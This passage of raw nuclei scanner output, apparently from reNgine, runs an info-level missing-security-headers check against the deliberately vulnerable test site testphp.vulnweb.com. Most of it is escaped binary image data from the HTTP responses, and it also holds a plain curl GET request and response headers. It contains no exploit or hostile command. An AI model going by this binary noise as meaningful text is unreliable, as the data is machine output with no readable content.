\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffdT\\u0018#4\\ufffd\\u0003\\ufffd\\ufffd$_\\ufffd\\ufffdLj\\ufffds\\u001fτ\\ufffd\\u0003\\ufffd5F\\ufffde}^\\ufffd錛\\ufffd˹Q\\ufffdܟݸn\\\\\\ufffd2pI\\ufffd\\u000e\\u0018\\ufffd\\ufffdp\\ufffdA\\u001bD\\ufffd$c+\\ufffd\\u001bP\\ufffd\\u000e\\ufffdr\\ufffd}\\ufffdی\\ufffd2@\\ufffd+E\\ufffdX\\ufffd\\ufffdl\\ufffd\\ufffdI$\\ufffd\\\\͈\\ufffd1\\ufffd\\u0018.\\ufffd\\u0005\\ufffd\\ufffd\\ufffd\\u001cs\\ufffdc\\u0007\\ufffdn\\ufffd\\u001f\\ufffd\\u0012K\\ufffdY\\ufffd\\u0017\\ufffd\\ufffd\\u000eO\\ufffd6\\u0001 \\u0012pH\\u001cx\\ufffd5\\u0013\\ufffdhkj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\u0003\\ufffdі4\\ufffdT\\ufffd\\ufffd\\u0019쥺{\\ufffdB[\\ufffd=\\ufffd\\u003c\\n\\u0010 \\ufffd\\u001d\\ufffdm9ov\\ufffdy\\ufffd\\u0003\\ufffd;\\u0000\\ufffd[Qm+\\ufffdfԯ`\\u0002HmIJB\\ufffd\\u0002\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u00157\\ufffdw\\ufffd\\ufffd\\ufffdRH\\ufffd/\\ufffd\\ufffdnTz\\ufffd\\ufffd\\t\\ufffd\\ufffd;C\\ufffd\\u000f\\u0019\\u0007;\\\\\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdҼ\\ufffd\\ufffd29\\u0006H\\u001bm\\ufffd:)\\ufffd\\ufffd{\\u0014%\\ufffdw\\ufffd\\ufffd4\\u000f\\ufffd{\\ufffdR\\ufffdK\\u001b\\ufffd)R{\\ufffd\\ufffd\\ufffdKA\\ufffd\\ufffdy\\u0019U)\\ufffd\\ufffd n%\\ufffdp2\\u0000ɮ\\ufffd\\ufffd\\ufffd4gP\\ufffd@%Cn\\ufffd|\\ufffd\\ufffd\\ufffds\\u001e\\ufffd\\ufffd\\ufffd=\\u0002\\ufffd\\ufffd\\ufffdL\\ufffdwH\\ufffd\\ufffd\\ufffd\\u0005Q\\ufffd\\ufffd\\ufffdB\\ufffd\\u001carX\\ufffd[\\ufffd\\u0018\\ufffd^X\\ufffdZ\\ufffd\\ufffd\\u000fy\\ufffdR\\ufffd\\ufffd\\ufffdn\\u001e\\ufffd\\nѤ\\ufffd\\ufffd$3\\ufffd\\ufffd\\ufffd\\ufffd.s\\ufffdd`\\ufffd\\r\\ufffdU\\ufffd\\u0004\\ufffd\\ufffd\\u0011\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd|\\ufffdT\\r\\u000e\\ufffd\\ufffd\\ufffd\\u0000#\\ufffd\\ufffdzӲ\\ufffd\\ufffddRm\\ufffd\\ufffd-. \\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd`q\\ufffd\\ufffd7WW\\ufffd\\u0019\\u0004py\\ufffdKTw\\ufffd\\ufffd\\ufffd\\u0015k\\ufffd^\\u0026\\ufffd\\u0014dc\\ufffd\\u0015!\\u0019\\ufffdL#\\u0014\\ufffd\\u0013\\ufffdu\\ufffdQE\\u0015ĤS[\\ufffd:\\ufffd\\ufffd\\ufffdRٔ\\ufffdQEq8\\ufffd\\ufffd\\u0010x\\ufffd\\u003e\\ufffd\\u0016ݣv{\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdwY\\u000b\\ufffd\\ufffdE@op\\u0007\\u001f4G4\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdYO\\ufffd\\ufffdG\\ufffdJ\\ufffd\\u0000u1\\ufffdp\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd]Һ\\ufffd\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffd+i\\u000b\\u003c\\u0013\\ufffd;\\ufffd\\u0002\\n\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd2\\u000b\\ufffd\\ufffdm6+\\ufffd\\u0016\\ufffd\\u0019\\ufffd\\ufffd\\u0006H\\ufffd\\ufffd2\\ufffd\\u0006\\ufffd\\u0002\\ufffd\\u0005H\\ufffd\\u0000H'#\\u000c8\\ufffd\\ufffdf\\ufffdw\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdt\\ufffd7\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffdZ\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\u0004\\ufffd\\u000c\\ufffdq\\ufffd\\ufffd\\ufffdƈ+\\ufffd|f\\ufffd\\u001e\\ufffdR\\ufffd\\ufffd@w\\ufffd\\ufffd\\ufffd\\ufffd\\u003e$\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdP\\u0010v\\ufffd\\ufffd\\u00078\\ufffd \\u000e\\u000f\\u0000\\u001c5c\\ufffd\\ufffd\\ufffdx`\\u0019\\u0026\\u0017b_\\ufffdy \\u000c\\u00021\\ufffdry\\u003e\\u0006\\u0001\\ufffd\\ufffd\\ufffdL~\\ufffd麪J\\ufffd\\ufffd\\ufffd:X\\ufffd\\ufffd\\u0018\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdl(,s\\ufffdq\\ufffd\\ufffd8\\ufffdߤ\\ufffd\\ufffd\\ufffd^\\ufffd]\\t\\ufffd\\ufffd\\u0005e\\ufffd\\u0010\\u0006\\ufffd\\ufffd;\\ufffda\\ufffd\\u001d\\ufffd\\ufffdL\\ufffd\\ufffdg\\u0015V\\ufffd\\ufffd梮\\ufffd\\ufffd45\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffdu3Y\\u003cU\\u0014\\ufffd\\u0010\\ufffd\\\\G\\ufffd\\ufffd(\\ufffd\\ufffd\\u0000\\u0004S.\\u0000S\\ufffdv\\ufffd)]\\ufffd8?\\ufffdT\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6\\ufffdg;U\\u0007\\ufffd\\ufffd\\ufffd\\u0007\\ufffdp+Ch?\\ufffd\\ufffdeN\\ufffd͂\\ufffdz\\\\[\\u000b\\tV\\ufffd=1\\u0011f!\\ufffd\\ufffd\\u0018݁\\ufffd\\ufffd\\u0000+\\ufffd\\u0000\\ufffdO\\u0003\\ufffd\\u0006Z\\ufffd\\ufffd\\ufffd\\ufffdels\\u001cq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd\\u0003\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\u000cFv\\ufffd\\ufffdS\\ufffd\\u001dr\\ufffdD\\ufffd\\ufffd9\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\u0000O\\u0004!w˳n\\ufffd\\u0016*\\ufffd\\u0001\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\u0003\\ufffdU5\\ufffduN\\ufffd6\\ufffd\\u0026\\ufffdB\\ufffd{i\\ufffdh\\ufffd\\ufffd\\ufffde)\\u0018dS\\ufffd\\ufffd\\u001e\\t\\u0019\\ufffd\\u00185\\u001eA\\u001b/{\\\\\\u000e\\ufffdEE\\u003c\\ufffd0\\ufffd\\u001aE\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdEr\\ufffda\\ufffd$\\ufffd\\u0018\\ufffd\\ufffd\\ufffd.\\ufffd\\u0015\\ufffd\\ufffd(\\ufffd\\ufffdu\\ufffd$`\\r7a\\ufffd\\ufffdB\\u0001MU\\u0002\\ufffd{=-\\ufffd}\\ufffd5^\\ufffdq\\ufffd(\\\\7)\\ufffd3Y\\ufffd#\\ufffd5-\\u001e?B\\ufffdoRɑ\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI]\\ufffd\\ufffd;\\ufffdv\\ufffd\\ufffd\\ufffdTG\\ufffd\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd#A\\u001e)\\ufffd\\ufffd|f\\ufffd6+\\ufffd\\ufffd\\ufffdz]\\ufffd\\u0015\\ufffdݴ\\ufffd\\ufffd͆\\ufffd\\ufffdFSϴ\\ufffd\\ufffdmĀ\\ufffd\\n\\u0014}ÀvΐV\\ufffd\\ufffd$\\ufffd\\ufffdE\\ufffd\\ufffd\\u0008\\u001d\\ufffdd\\ufffdz{\\ufffdl\\u00000\\ufffd\\ufffd\\ufffdA\\ufffd\\u0018\\r\\ufffd\\ufffd+\\ufffdS\\ufffd\\u0015\\ufffd\\ufffd\\u0000\\ufffd̈:;U\\ufffd\\u0018\\ufffd\\ufffdo\\ufffdC\\u001e\\ufffd\\ufffd\\u000cH\\u0014\\ufffd9\\u0000\\ufffdnq\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\\\\\ufffdZ\\u0007\\ufffd\\u003cc\\ufffd\\u001f\\u001f\\ufffd{\\ufffdc\\u0012\\ufffd\\u001er\\ufffd\\u001d\\ufffdP\\ufffd@\\ufffd\\ufffdE\\u001c\\ufffd\\ufffd+\\ufffdW\\ufffdk\\ufffd^?\\u0004\\u000f\\ufffd\\ufffdS\\ufffd\\ufffdM\\ufffd\\u00078=\\ufffd\\ufffd\\ufffd\\ufffdHc\\ufffdy\\ufffd\\ufffd S#\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffdo\\ufffd{)$g `\\ufffddR\\ufffd-\\ufffd\\ufffdb\\u0002\\ufffd\\ufffd\\u001d(!^\\ufffd\\ufffdL\\ufffd\\\\\\ufffdZ\\u0005\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd,ņ\\u0006;\\u000cg\\ufffd\\ufffd\\ufffd\\ufffdߨ\\ufffda\\ufffd\\ufffdԗ\\u001af\\ufffd,Q\\ufffdX\\ufffd\\ufffdn\\ufffd\\u0004\\ufffd\\u0000%\\ufffd9\\u0019V\\ufffd;\\ufffd3\\ufffd\\u001cv[\\ufffdk\\u000b)\\ufffdYA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\ufffd\\u0019\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffds~\\u003e\\ufffdc{q$\\ufffd4r\\u0008\\ufffd\\\"\\ufffdIȐ\\ufffd\\u003c\\ufffdKc䚶\\ufffd3Hǽ\\ufffd5\\r\\u0016h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffdAo\\ufffd\\ufffd\\ufffd[WGu\\ufffd\\ufffd\\ufffd\\ufffdjVs\\ufffd(\\ufffd}5\\ufffd.^\\u0010\\ufffd\\u00138bQ@]ː9\\u003c\\ufffd}\\ufffdkg\\ufffd\\u001f\\u0007k.@8a\\ufffd23\\ufffd\\ufffdkJ\\ufffd.\\ufffd\\ufffdӬn.\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffdE\\n\\ufffd\\u001cl\\ufffd\\u0018\\ufffd\\ufffd\\u0000\\ufffd\\ufffdp\\ufffdx\\u003e\\ufffdʫ)\\u0015\\ufffdA\\u001b\\ufffd\\ufffdY$\\ufffd\\ufffd\\ufffdYcm\\ufffdc\\ufffd\\u0018\\\\\\u0000|g\\ufffd{\\ufffd\\ufffdQ\\ufffd\\ufffdԲ\\ufffdYL\\ufffdX\\ufffd\\ufffd\\u0002\\ufffdw/~\\ufffd\\u001c\\ufffd\\ufffd:glz}n\\ufffd\\ufffd\\u0014\\ufffd\\ufffd\\ufffd\\ufffdeWJ\\ufffdn\\ufffd\\u0014QE\\tK\\ufffd\\ufffdS\\ufffd?\\ufffd\\u001e\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd2\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffd~(E\\ufffdh\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffdTl\\ufffd⤢\\ufffd\\u0003eRH\\ufffdv\\ufffd\\ufffd@\\ufffd\\u0004\\ufffd3\\ufffd\\t\\u003ce~\\ufffd\\ufffd\\ufffdW\\u0008\\ufffd\\ufffdvn\\u0018n\\u0001\\ufffdy \\ufffd\\ufffd\\u0012\\u0000\\ufffd\\ufffdG\\u0016\\ufffd\\ufffd)\\ufffd6ޙ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3\\u001b\\ufffd\\ufffd?\\u0014\\ufffd7\\u0002\\u0017\\ufffdl\\ufffd\\ufffdԴ\\ufffd.QU\\ufffd\\ufffdE\\ufffd#\\ufffd~8#8$g\\ufffd\\ufffd\\ufffdޑ-\\ufffd^\\ufffd\\ufffdKp\\ufffd\\ufffd\\ufffdaLͱG~\\u0013;s\\ufffd8\\ufffd'\\ufffdq\\\\\\ufffd􃨮.\\u0012]\\u001a\\ufffd帒\\u0012\\u001a\\u0007 \\ufffdH\\ufffd\\u0014\\ufffd\\u0003\\u0001U\\ufffd\\ufffd'\\ufffd\\u0000'\\u001c\\u000cV\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd%\\t\\u001eb\\ufffdUf\\ufffd;\\u0010\\ufffdX/%w0\\ufffd9\\ufffdk*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4;\\ufffd\\ufffd\\ufffd\\u0015ޒx*!\\ufffd:\\ufffd\\u0019X\\ufffdn\\ufffd^\\ufffd%\\ufffd\\u0001\\ufffd0\\ufffdF\\ufffdI\\ufffd\\ufffd\\u0018\\ufffd\\ufffd8 \\u001c\\ufffd\\ufffdd2\\ufffd\\u0007\\ufffd\\ufffd\\ufffdŧY\\ufffda\\ufffd8\\ufffdt\\ufffd\\ufffdQ\\u0019db\\ufffd\\ufffd\\u0018\\ufffd\\ufffdI\\u0018\\ufffdrN1\\ufffd\\ufffdV8\\ufffd\\u0015\\ufffdQD\\ufffdJv\\ufffd\\ufffd\\ufffd\\u001fUI\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdD\\ufffdK[\\ufffdqf\\ufffd\\ufffd\\ufffd*\\ufffdm\\u0004\\ufffd\\u0019\\ufffd?8\\ufffd#=\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd.\\ufffd\\ufffdI\\ufffdC\\ufffd\\ufffdb\\ufffd\\ufffd\\u001c[\\ufffd\\ufffd#ö\\u003cn\\u0008W\\ufffd\\u0005\\ufffd\\ufffd8 \\ufffd9\\ufffd\\ufffd6IP\\ufffd\\t\\ufffd\\ufffd\\ufffdyq\\u001c\\ufffd\\ufffd7PA\\ufffd\\ufffd=\\ufffd\\ufffd\\u0015\\ufffd0 1\\ufffd+s\\ufffd\\ufffd2\\u0006pO\\ufffd\\ufffd*\\ufffd9.\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd=R\\ufffdd\\u003c\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\u001f\\ufffd\\ufffdl\\ufffd\\ufffd\\ufffd\\u000f\\ufffdț,\\u0008e\\u0000\\ufffdq\\ufffd8$v\\ufffd\\u003cg\\ufffd\\u0017\\ufffdy\\ufffd\\ufffd\\ufffdM\\ufffdҭ\\ufffd./\\ufffd`N@P\\u0019\\ufffd\\u0004\\ufffd\\u00120q\\ufffdۃ\\ufffdv\\u0016\\u001b\\ufffd\\\"\\ufffd\\ufffdŤv2q\\ufffd\\ufffd\\ufffdѩ\\ufffd\\ufffd\\u001eI(\\ufffd\\ufffdez\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd$\\ufffd(?ju\\u0015\\ufffdۨ\\ufffd~iʠS\\ufffd\\ufffdȺ\\u0001 \\ufffdRJŁ\\u0026\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\u0005\\u0001:\\u000b\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003eU\\ufffd\\ufffd\\ufffdߐFA\\u001eA\\\"\\ufffd\\ufffdD\\ufffdV}C\\ufffd\\ufffd\\ufffd\\u0005\\u000c\\ufffd\\ufffd\\ufffdwo'\\ufffd\\ufffd\\u0019'i\\ufffdT\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffdCE֯\\ufffd[\\ufffdu\\ufffdʊ\\ufffd\\ufffd\\ufffdH\\ufffdш\\ufffdq\\ufffd\\u0016\\\\\\ufffd\\u001c3\\u000c\\ufffdj\\u001fX\\ufffd;|\\u003c,6p\\ufffd|\\ufffd\\ufffd\\ufffdON\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdWf\\ufffdڰ.\\ufffdVu \\u0015\\ufffd\\u0006\\u0016@G\\ufffd9\\u003c\\u001e\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGiz\\ufffdŔ:\\ufffd\\ufffdۥ\\ufffd\\ufffd\\ufffdT\\ufffd\\ufffdh\\ufffd\\ufffdz\\ufffd\\ufffd\\u0006=\\ufffdvFs\\ufffdr\\t\\ufffd4\\ufffds^\\ufffd7\\ufffd\\ufffdÝ\\ufffd\\u0011\\ufffdFW\\ufffd\\ufffd\\u003eT\\ufffd\\u000ct\\ufffdV$\\ufffd\\ufffdO\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\u0013\\u0008cc#M\\u0004\\ufffd\\u0019W\\ufffd\\ufffd\\ufffd\\ufffdGܮ\\u001c\\ufffd\\ufffd\\n~r(i\\ufffd\\ufffdjw\\u0006\\u0018Z\\u003c\\ufffd/\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffdx\\u0007\\u0004\\ufffdb21\\ufffd\\ufffdm\\ufffdu\\ufffdXZ\\ufffd*\\ufffdFھ\\ufffd\\ufffd\\u0000ҰEM\\ufffd\\ufffd$*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffdD}\\ufffd\\ufffdRzE\\u0003\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\u001a\\ufffd{\\ufffd0\\ufffd\\ufffd\\ufffds\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd(\\ufffd\\ufffdך\\ufffd\\u00063ڢ\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd\\\"\\ufffd(\\ufffd\\u0008\\ufffd\\ufffd(Bl\\ufffdmEE\\u0015Ġ\\ufffd\\u0006\\ufffd'=袄\\ufffd\\ufffd\\ufffd\\u000e\\ufffdw\\ufffdj\\ufffdwd\\ufffd:\\ufffdY\\u0018e%O(\\ufffdʜv\\ufffd\\u00020@5\\ufffd:\\ufffd6WWqDIX\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffdE\\u0015\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffdߴ\\ufffd+m6\\ufffd\\ufffde\\nč#;rX\\ufffd\\u001e\\ufffdI$\\ufffd\\ufffdw\\ufffd\\u0000\\u0006\\u0000\\ufffd\\\\0\\u0017\\ufffd7\\ufffd\\ufffdU\\u0003\\r\\u0018\\u000b\\ufffd\\ufffd\\u0011\\ufffd\\ufffd9\\u0018\\ufffd\\u0004w\\ufffd\\u003c`\\ufffd\\ufffdȾ$\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffdrțö\\u003e\\ufffdW\\ufffd\\ufffd\\u0013\\ufffdO.\\ufffd=\\ufffdП\\ufffd.\\ufffd\\u0004\\u0001\\ufffd\\ufffdc\\ufffdY!\\n\\ufffd\\ufffdWv\\ufffdv\\ufffd\\u0019e\\u0007\\ufffd\\u0015\\ufffd\\ufffdf\\ufffd\\ufffdӧ\\ufffd\\ufffdmn\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ݑ\\ufffd؁\\ufffd\\ufffd\\u003c`\\ufffd\\ufffd(\\ufffd:\\ufffd\\u0000\\ufffd\\u000f\\ufffdL\\ufffdOd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdigw|\\ufffd\\ufffd)\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u00078\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffd98\\ufffd@\\ufffdE\\u0015\\u0017\\ufffd1\\ufffd\\ufffd\\ufffdE\\ufffd\\u001f`\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\ufffd}\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:50.617843645Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"path\":\"/pictures/2.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"request\":\"GET /pictures/2.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1353\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-549\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001a\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0001\\u0003\\u0004\\u0005\\u0006\\ufffd\\ufffd\\u0000+\\u0010\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0000\\u0004\\u0007\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1AQ\\\"a\\u00142q\\ufffd\\u0005\\u0013$B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0003\\u0001\\u0002\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000'\\u0011\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0001\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1\\u0005Q\\u00132A\\\"#3aq\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffd\\ufffdd\\ufffdH䏺JU\\ufffd\\t\\u000f\\u0008\\ufffdi{\\u0015+f\\ufffd.7\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB6\\ufffd˨\\ufffd\\ufffd\\ufffd\\ufffd͒\\u001bdס\\u001a\\ufffdi\\ufffdE\\ufffdn\\ufffd_\\ufffd\\ufffd%\\u001atN\\u000c\\ufffdpR\\ufffdH\\u001d\\ufffd,֝\\ufffd\\u0000\\u0001 \\u0014\\u0000@'DQ\\u0003\\u0000Qu?b\\ufffd-\\u0010\\u0005\\ufffdL\\u0000\\u0000\\t\\u0000\\u0000\\u0000-\\u0005\\ufffd\\u0001\\ufffd\\ufffd\\u000cH\\ufffd'A\\u0015F\\ufffd\\u001a\\ufffdʔ?z3G\\ufffd^\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdK\\ufffd)\\ufffdۓ\\ufffdl\\ufffd%\\ufffd\\ufffd\\\"䨤\\ufffd\\u001f\\ufffdu\\u0015Ed44\\ufffd2\\u0005\\ufffdS\\ufffdD\\u0002Y\\u0005F\\ufffd`\\u0000\\u0000H\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\r\\u0011L`\\\"\\ufffd)4(\\u000cF\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003%C\\ufffd9\\ufffd\\ufffd1F\\ufffd$\\ufffdc$\\ufffd\\ufffd\\u000f\\ufffd~\\ufffdQ_\\ufffdק{c'K\\ufffd#\\ufffd\\ufffdr|\\ufffdR\\ufffd\\ufffd(\\ufffdԤ\\ufffdI}#;\\ufffd\\ufffdk\\ufffdʚ\\ufffd\\ufffdϳf\\ufffd\\ufffd\\ufffdEmZ\\u0010\\ufffd\\ufffd\\u0012Kȶ\\ufffdА\\ufffd\\ufffdC\\u0001Z\\u001a\\ufffdB\\u0000\\ufffd\\u0006Ҵ1I\\n\\u0004\\ufffd\\u0000X\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\ufffd\\u001com\\ufffd\\u0004\\ufffd,\\ufffd7\\u000e\\ufffd}\\ufffd\\\\1\\ufffd,\\ufffd\\u001f\\u0017\\ufffd\\ufffd#\\ufffdwG\\ufffdϫ\\ufffd\\u0016\\ufffd\\ufffd\\ufffddPf\\ufffd\\u003c\\u0013\\ufffdK\\ufffd\\ufffdG\\ufffd4j\\ufffd\\ufffd\\u001c\\ufffdi\\ufffd$\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffdj\\ufffd4C\\u000b\\ufffd\\ufffd\\ufffdg\\ufffd8\\ufffd`\\ufffd.\\ufffdΜy)\\ufffdN\\ufffd\\ufffd?\\ufffd\\ufffdj\\ufffd\\ufffd\\u001a\\ufffd*\\ufffdw\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd),\\u0012\\ufffd5b\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffdg%\\ufffd\\ufffd[7e\\ufffdb\\ufffd\\u001a\\ufffd\\u0000/\\ufffd$\\ufffdfiƎ֛3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdХ\\ufffd5b\\ufffdޥ\\ufffd@%Ţ\\u0008\\u0019v\\u0000\\u0000\\u0000\\u0014E\\u0012\\u0000M\\ufffd(\\ufffd\\u0018\\u0008\\ufffdw1h\\ufffd\\ufffd(\\ufffd\\ufffd\\ufffd\\u001e\\u001a7\\ufffd\\ufffdC\\u001c\\ufffd\\ufffd\\ufffd_\\ufffd\\u000c{,\\ufffd\\ufffdَ[]\\ufffd\\ufffdkp\\ufffd\\ufffdp}\\u001d?ĹI\\ufffd\\ufffd'\\ufffd\\u0026\\ufffdjq\\ufffd\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdWO\\ufffd\\ufffd\\ufffd\\ufffdkV\\ufffd\\ufffd\\ufffd}\\u001bq\\